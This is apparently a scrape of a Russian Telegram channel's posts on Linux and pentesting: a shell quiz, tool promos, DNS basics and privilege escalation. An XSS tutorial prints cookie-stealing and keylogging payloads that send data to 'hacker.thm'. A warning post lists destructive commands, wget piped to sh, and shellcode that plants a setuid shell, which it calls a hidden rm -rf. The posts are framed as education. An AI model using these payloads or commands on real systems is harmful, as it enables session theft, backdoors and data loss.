Какая зарезервированная переменная используется для вывода общего количества параметров, переданных скрипту?
Anonymous Quiz
16%
$0
35%
$#
32%
$*
18%
$?
😁8❤6👍5🔥4
Сниффер сетевого трафика, работающий в терминале, и предназначен для устранения неполадок в сети.
Его можно запускать в любое время для анализа процессов или соединений, вызывающих увеличение сетевого трафика, без загрузки каких-либо модулей ядра.
$ sudo apt-get install libpcap-dev@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19🔥6❤3🤔1
Не много отойдём от темы уязвимостей и поговорим про классный сканер уязвимостей веб приложений под названием Zap.
#Дисклеймер
Но перед тем как мы начнем. Маленький дисклеймер. Друзья, все что будет рассказано в данном посте, показывается исключительно для вашего самообразования и никак иначе. Если хотите что-то взломать, станьте пентестером или проходите CTF. Никогда не используйте знания во вред окружающим!
#FAQ
OWASP Zap - это среда тестирования безопасности, очень похожая на Burp Suite. Он действует как очень надежный инструмент для подсчета. Он используется для тестирования веб-приложений.
Почему бы мне не использовать Burp Suite?
Это хороший вопрос! Большинство людей в сообществе Info-sec ДЕЙСТВИТЕЛЬНО используют Burp Suite. Но OWASP ZAP имеет несколько преимуществ и функций, которых нет в Burp Suite, и это моя предпочтительная программа из двух.
#Преимущества OWASP ZAP?
Это полностью открытый исходный код и бесплатный. Нет премиум-версии, никаких функций, заблокированных за платный доступ, и нет проприетарного кода.
#Установка
OWASP ZAP имеет удобный установщик для систем Windows, Mac OS и Linux.
Скачайте и установите с официального сайта: https://www.zaproxy.org/download/
#Автоматичесское сканирование
Автоматическое сканирование позволяет нам выявить базовые уязвимости в веб приложении. Смысл в том, чтобы данное программное обеспечение помогло вам увидеть ни только уязвимости но и карту сайта.
ZAP сканирует сайт с помощью "Паука" и даже имеет возможность работать через прокси. Произвести автоматическое сканирование легко. Для этого достаточно просто нажать на кнопку "Automated Scan" вставить ссылку на нужный сайт в специальное окно и нажать Start.
#Ручное сканирование
Мы можем просканировать сайт в ручную, просто настроив прокси сервер однако для этого надо так-же как и в Burp Suite скачать ZAP сертификат и импортировать его в наш браузер.
На этом пока все. Скоро расскажу вам про особенные фишки ZAP и почему он немного больше чем просто сканнер.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍28🔥6❤4
👁🗨DNS в деталях
Сегодня мы будем говорить про DNS или же Domain Name System. Это веб приложение или же сервер, который нужен для получения Ip адреса по имени хоста в сети.
Дело в том, что изначально доменов не было и были только ip адреса, поэтому когда интернет стал массовым явлением и перестал быть ARPANET, пользователям надо было облегчить жизнь. Потому, запоминать каждый адрес из цифр просто невозможно.
Домены бывают нескольких типов: TLD (домен верхнего уровня), Домен второго уровня и субдомен.
1. Так, например, TLD hackedbypython.com - это .com . Существует два типа TLD: gTLD (общий верхний уровень) и ccTLD (национальный домен верхнего уровня).Исторически gTLD предназначался для того, чтобы сообщать пользователю назначение доменного имени; например .com будет использоваться в коммерческих целях, .org - для организации, .edu - для образования, а .gov - для правительства.
Если взять в качестве примера hackedbypython.com, то часть .com - это TLD, а tryhackme - это домен второго уровня. При регистрации доменного имени домен второго уровня ограничен 63 символами.
Субдомен находится слева от домена второго уровня, и его разделяет точка; например, в имени admin.hackedbypython.com административная часть - это Субдомен. Длина должна быть не более 253 символов
@linuxkalii
Сегодня мы будем говорить про DNS или же Domain Name System. Это веб приложение или же сервер, который нужен для получения Ip адреса по имени хоста в сети.
Дело в том, что изначально доменов не было и были только ip адреса, поэтому когда интернет стал массовым явлением и перестал быть ARPANET, пользователям надо было облегчить жизнь. Потому, запоминать каждый адрес из цифр просто невозможно.
Домены бывают нескольких типов: TLD (домен верхнего уровня), Домен второго уровня и субдомен.
1. Так, например, TLD hackedbypython.com - это .com . Существует два типа TLD: gTLD (общий верхний уровень) и ccTLD (национальный домен верхнего уровня).Исторически gTLD предназначался для того, чтобы сообщать пользователю назначение доменного имени; например .com будет использоваться в коммерческих целях, .org - для организации, .edu - для образования, а .gov - для правительства.
Если взять в качестве примера hackedbypython.com, то часть .com - это TLD, а tryhackme - это домен второго уровня. При регистрации доменного имени домен второго уровня ограничен 63 символами.
Субдомен находится слева от домена второго уровня, и его разделяет точка; например, в имени admin.hackedbypython.com административная часть - это Субдомен. Длина должна быть не более 253 символов
@linuxkalii
👍18🔥3❤1👎1
SpiderFoot – инструмент OSINT что автоматизирует анализ угроз и отображение поверхности атаки
Интегрируется практически со всеми доступными источниками данных и использует ряд методов для анализа данных, что упрощает навигацию, имеет встроенный веб-сервер
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
🖥 Github
@linuxkalii
Интегрируется практически со всеми доступными источниками данных и использует ряд методов для анализа данных, что упрощает навигацию, имеет встроенный веб-сервер
⚠️ Информация предоставлена исключительно с целью ознакомления. И побуждает обратить внимание на проблемы в безопасности.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥12👍8❤2
Сегодня речь пойдет о повышении привилегий на Linux системах.
Чтобы сразу не углубляться в дебри, имеет смысл сказать, что есть администратор (root) и другие пользователи, имена у которых могут быть разные. Зависит от воображения.
Пользователи делятся на группы, котором администратор назначает доступ к различным файлам и командам. Нас интересует команда sudo.
Sudo (англ. Substitute User and do, дословно «подменить пользователя и выполнить») — программа для системного администрирования UNIX-систем, позволяющая делегировать те или иные привилегированные ресурсы пользователям с ведением протокола работы.
Например:
Sudo whoami. Данная команда запустит команду whoami от лица root пользователя, которую в свою очередь скажет нам, "под каким" пользователем мы находимся в системе.
Смысл заключается в том, что мы можем эксплуатировать не правильные системные настройки или же версию ядра для получения более высоких привилегий в системе. Об этом я расскажу чуть позже. Важно понять азы.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥18👍6❤1
🔥 Полезные библиотеки Python
Osintgram - инструмент OSINT в Instagram для сбора, анализа и проведения разведки пользователя по нику. Предлагает широкий спектр методов.
⚙️ Инструкция по установке/использованию 👇
🖥 GitHub
@linuxkalii
Osintgram - инструмент OSINT в Instagram для сбора, анализа и проведения разведки пользователя по нику. Предлагает широкий спектр методов.
⚙️ Инструкция по установке/использованию 👇
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16❤1🔥1
Многие из нас уже имели дело с командной строкой. Этот классический текстовый интерфейс позволяет выполнять все необходимые задачи, с которыми не справляется GUI. Иногда работа с терминалом требует максимального погружения.
Любой универсальный разработчик должен владеть основными навыками использования командной строки: освоить принцип работы, научиться редактировать файлы, настраивать приложения и т.д. При этом совсем необязательно работать с черно-белым скучным интерфейсом. Почему бы не воспользоваться интересными и визуально эффектными программами для командной строки, которые обновляют ее внешнюю эстетику?
В статье мы проведем обзор сторонних программ, которые улучшают внешний вид консоли. И пусть совершенные функциональные возможности и производительность не входят в число главных приоритетов таких программ, зато они взрывают унылый интерфейс буйством красок.
▪ Читать
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍6❤3
Установка:
$ git clone https://github.com/githacktools/TorghostNG
$ cd TorghostNG
$ sudo python3 install.py
Использование:
$ sudo torghostng
⚙️ GitHub/Инструкция
#python #soft #github
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍17❤4🔥4
✔ XSS уязвимости на примере
Сегодня я расскажу Вам про XSS на примере и постараюсь объяснить все тонкости, которые можно уместить в три поста. Итак начнем!
#Что такое XSS
XSS или же Cross-site scripting это атака которая позволяет Вам встроить java code в сайт а иногда даже в его базу данных, что может повлечь серьезные проблемы.
#Полезная нагрузка
Для внедрения XSS используются полезные нагрузки. Это готовые строчки кода, которые упрощают пентестеру жизнь. Давайте рассмотрим примеры полезных нагрузок.
1. Кража сеанса:
Детали сеанса пользователя, такие как токены входа, часто хранятся в файлах cookie на целевом компьютере. Приведенный ниже JavaScript принимает целевой файл cookie, base64 кодирует файл cookie для обеспечения успешной передачи и затем отправляет его на веб-сайт под контролем хакера для регистрации. Как только хакер получит эти файлы cookie, он сможет захватить сеанс цели и войти в систему как этот пользователь.
💣
2. Key Logger:
Приведенный ниже код действует как регистратор ключей. Это означает, что все, что вы вводите на веб-странице, будет перенаправлено на веб-сайт, находящийся под контролем хакера. Это могло быть очень опасно, если бы полезная нагрузка веб-сайта была установлена на разрешенных логинах пользователей.
💣
#Reflected XSS
Всего бывают три вида XSS. Это reflected dom и stored. Давайте кратко рассмотрим первый вид.
Reflected xss это вид межсайтового скриптинга, в котором внедренный скрипт выполняется на стороне пользователя или же клиента. То есть, вы можете вывести слово или цифру с помощью строчки кода и если вы скинете ссылку человеку и он перейдет по ней, у него будет та же надпись что и у Вас.
Злоумышленник может отправлять ссылки или встраивать их в iframe на другом веб-сайте, содержащем полезную нагрузку JavaScript, потенциальным жертвам, заставляя их выполнить код в своем браузере, потенциально раскрывая информацию о сеансе или о клиенте.
После того как уязвимость найдена Злоумышленник может подключить программное обеспечение, которое упростит ему работу с кодом, просто нажав пару раз мышкой по интерфейсу программы.
@linuxkalii
Сегодня я расскажу Вам про XSS на примере и постараюсь объяснить все тонкости, которые можно уместить в три поста. Итак начнем!
#Что такое XSS
XSS или же Cross-site scripting это атака которая позволяет Вам встроить java code в сайт а иногда даже в его базу данных, что может повлечь серьезные проблемы.
#Полезная нагрузка
Для внедрения XSS используются полезные нагрузки. Это готовые строчки кода, которые упрощают пентестеру жизнь. Давайте рассмотрим примеры полезных нагрузок.
1. Кража сеанса:
Детали сеанса пользователя, такие как токены входа, часто хранятся в файлах cookie на целевом компьютере. Приведенный ниже JavaScript принимает целевой файл cookie, base64 кодирует файл cookie для обеспечения успешной передачи и затем отправляет его на веб-сайт под контролем хакера для регистрации. Как только хакер получит эти файлы cookie, он сможет захватить сеанс цели и войти в систему как этот пользователь.
💣
<script>fetch('https://hacker.thm/steal?cookie=' + btoa(document.cookie));</script>2. Key Logger:
Приведенный ниже код действует как регистратор ключей. Это означает, что все, что вы вводите на веб-странице, будет перенаправлено на веб-сайт, находящийся под контролем хакера. Это могло быть очень опасно, если бы полезная нагрузка веб-сайта была установлена на разрешенных логинах пользователей.
💣
<script>document.onkeypress = function(e) { fetch('https://hacker.thm/log?key=' + btoa(e.key) );}</script>#Reflected XSS
Всего бывают три вида XSS. Это reflected dom и stored. Давайте кратко рассмотрим первый вид.
Reflected xss это вид межсайтового скриптинга, в котором внедренный скрипт выполняется на стороне пользователя или же клиента. То есть, вы можете вывести слово или цифру с помощью строчки кода и если вы скинете ссылку человеку и он перейдет по ней, у него будет та же надпись что и у Вас.
Злоумышленник может отправлять ссылки или встраивать их в iframe на другом веб-сайте, содержащем полезную нагрузку JavaScript, потенциальным жертвам, заставляя их выполнить код в своем браузере, потенциально раскрывая информацию о сеансе или о клиенте.
После того как уязвимость найдена Злоумышленник может подключить программное обеспечение, которое упростит ему работу с кодом, просто нажав пару раз мышкой по интерфейсу программы.
@linuxkalii
👍16❤3🔥3
✖ Nrich инструмент для сканирования портов и поиска уязвимостей.
Новый инструмент командной строки для быстрого анализа списка IP-адресов и просмотра открытых портов и уязвимостей.
▪ Gitlab
@linuxkalii
Новый инструмент командной строки для быстрого анализа списка IP-адресов и просмотра открытых портов и уязвимостей.
▪ Gitlab
@linuxkalii
🔥26❤5👍4🥰1
⚡️ XSS уязвимости на примере Ч.2
Это вторая часть серии постов про XSS уязвимости на примере. Сегодня постараюсь рассмотреть и показать Вам принцип работы XSS "Хранимого" типа. Погнали.
#Хранимые XSS
Хранимые XSS это тип Кросс-сайт сриптинга где, полезная нагрузка которого обрабатывается на серверной стороне. А именно взаимодействует с базами данных.
#Принцип действия
Веб-сайт блог, который позволяет пользователям публиковать комментарии. К сожалению, эти комментарии не проверяются на предмет того, содержат ли они JavaScript или отфильтровывают какой-либо вредоносный код. И если мы сейчас опубликуем комментарий, содержащий JavaScript, он будет сохранен в базе данных, и у каждого другого пользователя, который сейчас посещает статью, будет запускаться JavaScript в своем браузере.
Таким образом, вредоносный код который мы встраиваем в Java Script, в качестве полезной нагрузки позволяет нам перенаправлять пользователей на другой сайт, который может быть нашим фишинговым сайтом, красть cookie файлы, и даже установить обратное подключение.
1 часть
@linuxkalii
Это вторая часть серии постов про XSS уязвимости на примере. Сегодня постараюсь рассмотреть и показать Вам принцип работы XSS "Хранимого" типа. Погнали.
#Хранимые XSS
Хранимые XSS это тип Кросс-сайт сриптинга где, полезная нагрузка которого обрабатывается на серверной стороне. А именно взаимодействует с базами данных.
#Принцип действия
Веб-сайт блог, который позволяет пользователям публиковать комментарии. К сожалению, эти комментарии не проверяются на предмет того, содержат ли они JavaScript или отфильтровывают какой-либо вредоносный код. И если мы сейчас опубликуем комментарий, содержащий JavaScript, он будет сохранен в базе данных, и у каждого другого пользователя, который сейчас посещает статью, будет запускаться JavaScript в своем браузере.
Таким образом, вредоносный код который мы встраиваем в Java Script, в качестве полезной нагрузки позволяет нам перенаправлять пользователей на другой сайт, который может быть нашим фишинговым сайтом, красть cookie файлы, и даже установить обратное подключение.
1 часть
@linuxkalii
🔥14👍7❤1
Поисковая система умеет искать по домену, заголовку страницы, протоколу, местоположению, сертификатам, http-заголовкам, ASN, названию продукта и др.
⚙️ Инструмент
#infosec #search
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍23❤10🔥2
LogonTracer
Софт связывает имя хоста (или IP-адрес) и имя учетной записи, обнаруженные в событиях, связанных со входом в систему, и отображает их в виде графа.
#Пентес
🖥 GitHub
@linuxkalii
Софт связывает имя хоста (или IP-адрес) и имя учетной записи, обнаруженные в событиях, связанных со входом в систему, и отображает их в виде графа.
#Пентес
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12❤10🔥1
Octosuite
Octosuite - продвинутый и полезный OSINT инструмент для сбора информации о пользователях, репозиториях и организациях GitHub с открытым исходным кодом.
🖥 Github
@linuxkalii
Octosuite - продвинутый и полезный OSINT инструмент для сбора информации о пользователях, репозиториях и организациях GitHub с открытым исходным кодом.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19❤7🔥2
🔐 Hashcat
Hashcat известен в сообществе экспертов по безопасности как самая быстрая и продвинутая утилита для взлома паролей и восстановления.
Этот проект с открытым исходным кодом, механизмом обработки правил в ядре, более 300 типов хешей и встроенной системой бенчмаркинга.
🖥 Github
@linuxkalii
Hashcat известен в сообществе экспертов по безопасности как самая быстрая и продвинутая утилита для взлома паролей и восстановления.
Этот проект с открытым исходным кодом, механизмом обработки правил в ядре, более 300 типов хешей и встроенной системой бенчмаркинга.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍25❤10🔥3🤔1
📡 Athena OS
Athena OS - дистрибутив Linux для cпецов по информационной безопасности, охотников за ошибками, пантестеров и хакеров. Отличный инструмент для пентестинга.
#Linux #Pentest #Arch
🖥 Github
@linuxkalii
Athena OS - дистрибутив Linux для cпецов по информационной безопасности, охотников за ошибками, пантестеров и хакеров. Отличный инструмент для пентестинга.
#Linux #Pentest #Arch
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍30❤15🔥2
🔏 Контрольный список безопасности API
Чеклист наиболее важных контрмер по безопасности при разработке, тестировании и выпуске вашего API.
🖥 Github
@linuxkalii
Чеклист наиболее важных контрмер по безопасности при разработке, тестировании и выпуске вашего API.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍19❤8🔥2
🚀 Шпаргалка Kali Linux
▪ SQLMap Examples
▪ Metasploit
▪ Exploit Research
▪ Password Cracking
▪ Username Enumeration
▪ HTTP / HTTPS Webserver Enumeration
▪ DNSRecon
▪ NMAP Commands и д.р
#linux #pentest #github
@linuxkalii
▪ SQLMap Examples
▪ Metasploit
▪ Exploit Research
▪ Password Cracking
▪ Username Enumeration
▪ HTTP / HTTPS Webserver Enumeration
▪ DNSRecon
▪ NMAP Commands и д.р
#linux #pentest #github
@linuxkalii
👍38❤7🔥3👎2😱1
Командная строка Linux — очень продуктивная, полезная и интересная, но иногда она может быть очень опасной, особенно когда вы не уверены, что вы делаете. Для некоторых команд в командной строке вы должны перепроверить синтаксис дважды, прежде чем нажмёте Enter.
Команда rm -rfКоманда rm -rf — это один из самых быстрых способов удалить каталог и его содержимое. Но небольшая опечатка или незнание могут привести к непоправимому разрушению системы. Некоторые опции, используемые с командой rm.rm в Linux используется для удаления файлов.
Команда rm -r удаляет каталог рекурсивно, даже если он непустой.
Команда rm -f удаляет файлы без запроса файлы ‘Только для чтения’.
rm -rf / : Принудительное удаление всего в корневой директории.
rm -rf * : Принудительное удаление всего в текущей/рабочей директории.
rm -rf . : Принудительное удаление всего в текущей директории и поддиректориях.Следовательно, нужно быть осторожным, когда вы выполняете команду rm -rf. Чтобы обойти несчастные случаи с удалением файлов командой ‘rm‘, сделайте псевдоним (алиас) команды с параметром rm -i в файле “.bashrc”, после этого всегда будет появляться запрос при любому удалении.
Команда :(){ :|:& };:В действительности эта команда является логической бомбой. Она оперирует определением функции с именем ‘:‘, которая вызывает сама себя дважды: один раз на переднем плане и один раз в фоне. Она продолжает своё выполнение снова и снова, пока система не зависнет.
:(){ :|:& };:
Команда > /dev/sdaВышеприведённый пример пишет вывод «команды» в блок /dev/sda. Вышеприведённая команда пишет сырые данные и все файлы в блоке будут заменены сырыми данными, это станет причиной полной потери данных блока.
mv folder /dev/nullКоманда mv переместит ‘folder‘ в /dev/null. В Linux /dev/null или null устройство — это специальный файл, который сбрасывает все данные, записанные в него, и сообщает, что операция записи прошла успешно.
# mv /home/user/* /dev/nullВышеприведённая команда переместит всё содержимое пользовательских директорий user в /dev/null, что фактически является переносом всех данных в чёрную дыру (null).
wget http://malicious_source -O- | shЭтот пример wget загрузит скрипт из вредоносного источника и выполнитего
mkfs.ext3 /dev/sda
Этот пример отформатирует ‘
sda’. После выполнения данной команды ваш жёсткий диск будет помечен как «Новый». Вы останетесь без каких либо данных и с системой не подлежащей восстановлению.> fileЭта команда используется для стирания текущего файла. Если эта команда будет выполнена с опечаткой или незнанием вроде “
> xt.conf”, то это сотрёт конфигурационный или любой другой файл.Это распространённая ошибка начинающих пользователей командной строки, когда они путают символы | (труба) и > (перенаправление вывода).
Например, вот так правильно:
echo 456 | grep -E '[0-9]'А вот так вы затрёте бинарный файл:
echo 456 > grep -E '[0-9]'
^foo^barЭта команда используется для редактирования предыдущей запущенной команды без необходимости снова заново печатать всю команду. Это может быть действительно опасно.
dd if=/dev/random of=/dev/sdaЭта
dd сотрёт блок устройства sda и заполнит его рандомным мусором. Система будет неработоспособной.Скрытая команда
Команда ниже — это ничего более как rm -rf. Эта команда спрятана в шестнадцатеричную запись и пользователь может быть одурачен и запустить её. Запуск этого кода сотрёт ваш корневой раздел. Эта команда показывает здесь, что опасность может быть спрятана и иногда её трудно выявить.
char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍47❤12🔥7
Полезная библиотека на Go для сбора сетевых диапазонов по ASN организации.
@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍22❤7🔥2